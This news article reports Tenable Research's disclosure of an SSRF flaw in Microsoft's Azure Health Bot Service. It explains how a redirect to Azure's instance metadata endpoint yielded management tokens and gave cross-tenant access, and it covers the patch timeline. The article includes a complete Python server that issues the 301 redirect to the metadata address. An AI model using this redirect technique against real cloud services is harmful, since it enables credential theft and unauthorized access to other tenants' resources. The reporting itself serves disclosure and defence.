Tenable Research has uncovered significant security vulnerabilities in Microsoft’s Azure Health Bot Service, a cloud platform designed to enable healthcare professionals to deploy AI-powered virtual health assistants.
The Azure AI Health Bot Service is a cloud-based platform designed for healthcare organizations. It enables developers to create and deploy AI-driven virtual health assistants, which help streamline processes and reduce costs while ensuring compliance with industry standards.
These vulnerabilities allowed unauthorized access to cross-tenant resources, raising concerns about potential lateral movement to other resources within the service.
Tenable’s investigation focused on a feature called “Data Connections,” which allows the Azure Health Bot Service to interact with external data sources. While testing these data connections, researchers discovered a server-side request forgery (SSRF) vulnerability.
This vulnerability enabled them to bypass existing security filters and access sensitive internal endpoints, such as Azure’s Internal Metadata Service (IMDS).
Easily analyze emerging malware with ANY.RUN interactive online sandbox - Try 14 Days Free Trial
Technical Analysis
The SSRF vulnerability was exploited by configuring a data connection to redirect requests to an external host controlled by the Attackers.
The host was set up to respond with a 301 redirect to the IMDS endpoint, allowing the researchers to obtain a valid metadata response. Using this response, they acquired an access token for management.azure.com and subsequently listed subscriptions and resources belonging to other customers.
The Tannable researchers employed a Python script to set up the HTTP server that facilitated the SSRF attack:
#!/usr/bin/python3
from http.server import HTTPServer, BaseHTTPRequestHandler
def servePage(s, hverb):
s.protocol_version = 'HTTP/1.1'
s.server_version = 'Microsoft-IIS/8.5'
s.sys_version = ''
s.send_response(301)
s.send_header('Location', 'http://169.254.169.254/metadata/instance?api-version=2021-12-13')
s.end_headers()
message = ""
s.wfile.write(bytes(message, "utf8"))
return
class StaticServer(BaseHTTPRequestHandler):
def do_GET(self):
servePage(self, "GET")
return
def main(server_class=HTTPServer, handler_class=StaticServer, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
httpd.serve_forever()
main()By configuring a data connection within the service’s scenario editor, attackers could specify an external host under their control.
This host was configured to respond to requests with a 301 redirect response destined for Azure’s IMDS. Using this technique, attackers could obtain a valid metadata response and subsequently obtain an access token for management.azure.com.
Response and Mitigation
Upon discovering the vulnerabilities, Tenable immediately reported them to Microsoft’s Security Response Center (MSRC) on June 17, 2024. MSRC quickly acknowledged the report and began implementing fixes.
By July 2, Microsoft confirmed that all affected services and regions had been patched, with no customer action required.
Tenable later identified another vulnerable endpoint for validating FHIR endpoints’ data connections. Although this endpoint was susceptible to a similar attack, it did not allow cross-tenant access. This second issue was reported on July 9, with fixes implemented by July 12.
These vulnerabilities underscore the importance of robust web applications and cloud security mechanisms, even in AI-powered services.
While no evidence suggests that malicious actors exploited these vulnerabilities, the incident highlights the need for continuous security auditing and proactive vulnerability management.
Free Webinar on Detecting & Blocking Supply Chain Attack -> Book your Spot